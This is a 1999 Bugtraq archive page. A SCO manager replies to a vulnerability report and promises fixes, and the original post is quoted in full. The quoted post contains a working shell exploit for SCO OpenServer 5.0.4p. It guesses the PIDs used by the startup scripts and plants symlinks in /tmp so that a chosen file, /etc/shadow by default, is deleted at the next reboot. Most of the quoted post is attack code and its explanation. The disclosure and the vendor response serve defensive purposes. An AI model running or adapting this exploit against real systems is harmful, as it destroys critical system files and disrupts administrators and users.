Bugtraq mailing list archives
Re: Little exploit for startup scripts (SCO 5.0.4p).
From: jonco () SCO com (Jon Coyle)
Date: Mon, 8 Mar 1999 11:58:54 -0000
Leshka, We have started work on this and are checking all of our OS products to see if they suffer from similar problems. We will make information available at our security pages http://www.sco.com/security) on how to work around the problem, and will also have fixes available in a few days. Thanks, Jon
-----Original Message----- From: Bugtraq List [mailto:BUGTRAQ () netspace org]On Behalf Of leshka Sent: 07 March 1999 12:07 To: BUGTRAQ () netspace org Subject: Little exploit for startup scripts (SCO 5.0.4p). #!/bin/sh # # ... The punishment for inobedience ... # (Cycle # 2) # # This simple script can help to erase any file # (SCO OpenServer Enterprise System v 5.0.4p). # Have fun ! # # # # # Some of "/etc/rc2.d" startup scripts create and then delete temporary files # with easily predictable names in "/tmp" directory. Below there is a few # interesting fragments of those nice scripts: # # S84rpcinit: # ... # /bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$ # /bin/rm -f /tmp/rpc.err$$ # ... # rm -rf /tmp/rpc$$ # # S95nis: # ... # /bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$ # /bin/rm -f /tmp/nis.err$$ # ... # rm -f /tmp/nis$$ # # S85tcp: # ... # /bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$ # /bin/rm -f /tmp/ps.err$$ # ... # /bin/rm -f /tmp/tps$$ # # S89nfs: # ... # /bin/su root -c "/bin/ps -ef" > /tmp/nfs$$ 2>/tmp/nfs.err$$ # /bin/rm -f /tmp/nfs.err$$ # ... # rm -f /tmp/nfs$$ # # Every time during the startup such shell scripts creates files with names # that include a process number of the above shell script. My numerous tests # showed that the number is always the same with every reboot. Pretty good, # isn't it? One problem: how to determine the process number of such script? # It's so simple! Child processes of this script have PID's with values # slightly over than the parent's PID. A little math and one gets it. Next # step is creating a few symbolic links to the victime file in the "/tmp" # directory. During the next startup the victim file will be destroyed. # # P.S. Looking forward to getting published a complete SCO's list of names # of such perfect shell scripts. # # 999,99*2 # # ---------------------- # --------------------------------------------- # ----------------- Dedicated to my beautiful lady ------------------ # --------------------------------------------- # ---------------------- # # Leshka Zakharoff, 1999. E-mail: leshka () leshka chuvashia su (.ru) # # # if [ _$1 = "_" ] then { echo -n "File to delete [/etc/shadow]:" read victim_file if [ _$victim_file = "_" ] then victim_file="/etc/shadow" fi } else victim_file=$1 fi pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf $2 }'` lastpid=`expr $pid - 30` while [ $pid != $lastpid ] do pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid done echo Done ! File \"$victim_file\" will be destroyed after the next reboot.
---- Jon Coyle - Manager, Internet Engineering & Secure Technologies jonco () sco com SCO Ltd. Tel: +44 1923 813656 Croxley Business Park Fax: +44 1923 813804 Hatters Lane http://www.sco.com Watford, WD1 8YN, UK Fingerprint: F44A 677A 4920 02AC C655 D419 B9B7 46B0 A951 6FF7
Current thread:
- More Internet Explorer zone confusion, (continued)
- More Internet Explorer zone confusion Jim Paris (Mar 05)
- Re: More Internet Explorer zone confusion Walt Armour (Mar 08)
- Re: More Internet Explorer zone confusion Jeremy Nimmer (Mar 08)
- Re: More Internet Explorer zone confusion Jim Paris (Mar 08)
- ISAPI Extension vulnerability allows to execute code as SYSTEM Aleph One (Mar 08)
- Re: More Internet Explorer zone confusion David E. Smith (Mar 08)
- Little exploit for startup scripts (SCO 5.0.4p). leshka (Mar 07)
- Re: Little exploit for startup scripts (SCO 5.0.4p). Peter van Dijk (Mar 07)
- Re: Little exploit for startup scripts (SCO 5.0.4p). Taneli Leppä (Mar 08)
- Call for Papers: CQRE Detlef Hühnlein (Mar 08)
- Re: Little exploit for startup scripts (SCO 5.0.4p). Jon Coyle (Mar 08)